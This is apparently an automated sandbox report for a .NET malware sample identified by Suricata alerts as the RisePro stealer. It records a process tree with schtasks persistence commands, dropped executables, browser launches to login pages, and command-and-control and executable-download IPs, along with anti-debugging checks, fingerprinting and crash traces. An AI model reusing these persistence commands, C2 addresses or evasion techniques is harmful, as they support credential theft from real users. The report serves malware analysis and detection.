Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Jan. 19, 2024, 7:56 a.m.	Jan. 19, 2024, 8 a.m.

Size	1.5MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`b716baea0866421f013912e77e5db815`
SHA256	`ff6d1e2e67efbf5eae5a6814c8655423e67f48fc8c2375d158e0c1f8e3e9e144`
CRC32	`F4ED70BE`
ssdeep	`24576:Zj9bjkIP9yCNPPZW1XCzQ4J0vbl9bK/0NfmafPpLrloEJzU1WwlIiYTJiOV2Exwu:1ZBZrq1DusNfxPpJJzUceRYTXgEuu`
PDB Path	Fantasy.pdb
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description)

room.exe "C:\Users\test22\AppData\Local\Temp\room.exe"
516
- RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2064
  - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
    2512
  - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
    2620
  - 27dnxXnblzFDiZPFTSr6.exe "C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\27dnxXnblzFDiZPFTSr6.exe"
    2784
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
      2836
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2836 CREDAT:145409
        2912
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com
      2568
      - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef2566e00,0x7fef2566e10,0x7fef2566e20
        2636
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login
      3060
      - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xac,0xb0,0xb4,0x80,0xb8,0x7fef2566e00,0x7fef2566e10,0x7fef2566e20
        1664
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
      2760
      - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xac,0xb0,0xb4,0x80,0xb8,0x7fef2566e00,0x7fef2566e10,0x7fef2566e20
        2516
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      1012
      - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
        1340
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
      1132
      - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
        1044
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
      2524
      - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
        1176
  - Ovmqrne2EgFGXsI2OqUM.exe "C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\Ovmqrne2EgFGXsI2OqUM.exe"
    932
  - 5230B0bsHB6m0ZI1S5Bl.exe "C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\5230B0bsHB6m0ZI1S5Bl.exe"
    2292
  - TTPWYoz21cqHkGJWQZz9.exe "C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\TTPWYoz21cqHkGJWQZz9.exe"
    2204

Name	Response	Post-Analysis Lookup
ssl.gstatic.com	A 142.251.222.3	142.250.76.131
accounts.google.com	A 142.251.8.84	64.233.187.84
ipinfo.io	A 34.117.186.192	34.117.186.192
www.google.com	A 142.250.199.100	142.250.76.132
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.5.15

IP Address	Status	Action
154.92.15.189	Active	Moloch
104.26.4.15	Active	Moloch
109.107.182.3	Active	Moloch
117.18.232.200	Active	Moloch
142.250.199.100	Active	Moloch
142.251.222.3	Active	Moloch
142.251.8.84	Active	Moloch
164.124.101.2	Active	Moloch
185.215.113.68	Active	Moloch
193.233.132.62	Active	Moloch
34.117.186.192	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49169 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49169 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49169 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49168	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 193.233.132.62:50500	2049060	ET MALWARE Suspected RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49168	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	Malware Command and Control Activity Detected
TCP 185.215.113.68:80 -> 192.168.56.103:49182	2400020	ET DROP Spamhaus DROP Listed Traffic Inbound group 21	Misc Attack
TCP 192.168.56.103:49171 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49182 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49182 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49182	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49191 -> 142.251.222.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 109.107.182.3:80 -> 192.168.56.103:49181	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 109.107.182.3:80 -> 192.168.56.103:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49182	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.103:49182	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49196 -> 142.250.199.100:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49188 -> 142.251.8.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49189 -> 142.251.8.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49192 -> 142.251.222.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49181	2014819	ET INFO Packed Executable Download	Misc activity
TCP 109.107.182.3:80 -> 192.168.56.103:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 142.250.199.100:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49169 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49171 104.26.4.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49191 142.251.222.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	6f:8c:8c:6f:06:bf:0d:24:7e:8d:3d:09:0d:07:26:df:c3:6e:47:c0
TLSv1 192.168.56.103:49196 142.250.199.100:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	cf:73:8c:78:50:35:aa:62:03:1d:34:01:0d:0e:90:a3:9a:5f:0d:d9
TLSv1 192.168.56.103:49188 142.251.8.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	e1:91:9a:16:6f:2f:49:fb:1c:f6:d7:db:dd:f0:e2:b0:9f:34:cc:e4
TLSv1 192.168.56.103:49189 142.251.8.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	e1:91:9a:16:6f:2f:49:fb:1c:f6:d7:db:dd:f0:e2:b0:9f:34:cc:e4
TLSv1 192.168.56.103:49192 142.251.222.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	6f:8c:8c:6f:06:bf:0d:24:7e:8d:3d:09:0d:07:26:df:c3:6e:47:c0
TLSv1 192.168.56.103:49197 142.250.199.100:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	cf:73:8c:78:50:35:aa:62:03:1d:34:01:0d:0e:90:a3:9a:5f:0d:d9

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameA Jan. 19, 2024, 7:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 19, 2024, 7:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 19, 2024, 7:56 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (35 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 19, 2024, 7:56 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:56 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:56 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:57 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Jan. 19, 2024, 7:51 a.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Jan. 19, 2024, 7:56 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1	0
WriteConsoleW Jan. 19, 2024, 7:56 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

Fantasy.pdb

Tries to locate where the browsers are installed (4 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 19, 2024, 7:56 a.m.		1	1	0

One or more processes crashed (9 events)

Time & API	Arguments	Status
__exception__ Jan. 19, 2024, 7:57 a.m.	stacktrace: RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x7796f559 RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x7796f639 RtlUlonglongByteSwap+0xba5 RtlFreeOemString-0x20d35 ntdll+0x7df95 @ 0x7791df95 HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x757f14dd regasm+0x1127b6 @ 0x5127b6 regasm+0x1093cc @ 0x5093cc regasm+0xfb0fc @ 0x4fb0fc regasm+0x12cff2 @ 0x52cff2 regasm+0x10dd83 @ 0x50dd83 regasm+0x10e037 @ 0x50e037 regasm+0x10abf8 @ 0x50abf8 regasm+0x10ab24 @ 0x50ab24 regasm+0x10ace6 @ 0x50ace6 regasm+0x10ae4d @ 0x50ae4d regasm+0xfb482 @ 0x4fb482 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff exception.symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653 exception.instruction: jmp 0x7796e667 exception.module: ntdll.dll exception.exception_code: 0xc0000374 exception.offset: 845395 exception.address: 0x7796e653 registers.esp: 2292812 registers.edi: 6092104 registers.eax: 2292828 registers.ebp: 2292932 registers.edx: 0 registers.ebx: 0 registers.esi: 5832704 registers.ecx: 2147483647	1
__exception__ Jan. 19, 2024, 7:57 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 106426500 registers.edi: 77971076 registers.eax: 106426500 registers.ebp: 106426580 registers.edx: 312 registers.ebx: 106426864 registers.esi: 2147746133 registers.ecx: 78256792	1
__exception__ Jan. 19, 2024, 7:57 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x727e540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x727e52ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x728c0ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 73587416 registers.edi: 1974991376 registers.eax: 73587416 registers.ebp: 73587496 registers.edx: 1 registers.ebx: 8706476 registers.esi: 2147746133 registers.ecx: 4261783159	1
__exception__ Jan. 19, 2024, 7:57 a.m.	stacktrace: ovmqrne2egfgxsi2oqum+0x207cf7 @ 0xe07cf7 ovmqrne2egfgxsi2oqum+0x20a164 @ 0xe0a164 ovmqrne2egfgxsi2oqum+0x2f450c @ 0xef450c exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ovmqrne2egfgxsi2oqum+0x1535d0 exception.instruction: ud2 exception.module: Ovmqrne2EgFGXsI2OqUM.exe exception.exception_code: 0xc000001d exception.offset: 1390032 exception.address: 0xd535d0 registers.esp: 3538520 registers.edi: 15683824 registers.eax: 0 registers.ebp: 3538548 registers.edx: 2 registers.ebx: 725154822 registers.esi: 13041664 registers.ecx: 38746312	1
__exception__ Jan. 19, 2024, 7:57 a.m.	stacktrace: ovmqrne2egfgxsi2oqum+0x207cf7 @ 0xe07cf7 ovmqrne2egfgxsi2oqum+0x20a164 @ 0xe0a164 ovmqrne2egfgxsi2oqum+0x2f450c @ 0xef450c exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ovmqrne2egfgxsi2oqum+0x1535d0 exception.instruction: ud2 exception.module: Ovmqrne2EgFGXsI2OqUM.exe exception.exception_code: 0xc000001d exception.offset: 1390032 exception.address: 0xd535d0 registers.esp: 3538520 registers.edi: 3538520 registers.eax: 0 registers.ebp: 3538548 registers.edx: 2 registers.ebx: 13972966 registers.esi: 0 registers.ecx: 3538556	1
__exception__ Jan. 19, 2024, 7:57 a.m.	stacktrace: ovmqrne2egfgxsi2oqum+0x207cf7 @ 0xe07cf7 ovmqrne2egfgxsi2oqum+0x20a164 @ 0xe0a164 ovmqrne2egfgxsi2oqum+0x2f450c @ 0xef450c exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ovmqrne2egfgxsi2oqum+0x1535d0 exception.instruction: ud2 exception.module: Ovmqrne2EgFGXsI2OqUM.exe exception.exception_code: 0xc000001d exception.offset: 1390032 exception.address: 0xd535d0 registers.esp: 3538520 registers.edi: 3538520 registers.eax: 0 registers.ebp: 3538548 registers.edx: 2 registers.ebx: 13972966 registers.esi: 0 registers.ecx: 3538556	1
__exception__ Jan. 19, 2024, 7:57 a.m.	stacktrace: ovmqrne2egfgxsi2oqum+0x207cf7 @ 0xe07cf7 ovmqrne2egfgxsi2oqum+0x20a164 @ 0xe0a164 ovmqrne2egfgxsi2oqum+0x2f450c @ 0xef450c exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ovmqrne2egfgxsi2oqum+0x1535d0 exception.instruction: ud2 exception.module: Ovmqrne2EgFGXsI2OqUM.exe exception.exception_code: 0xc000001d exception.offset: 1390032 exception.address: 0xd535d0 registers.esp: 3538520 registers.edi: 3538520 registers.eax: 0 registers.ebp: 3538548 registers.edx: 2 registers.ebx: 13972966 registers.esi: 0 registers.ecx: 3538556	1
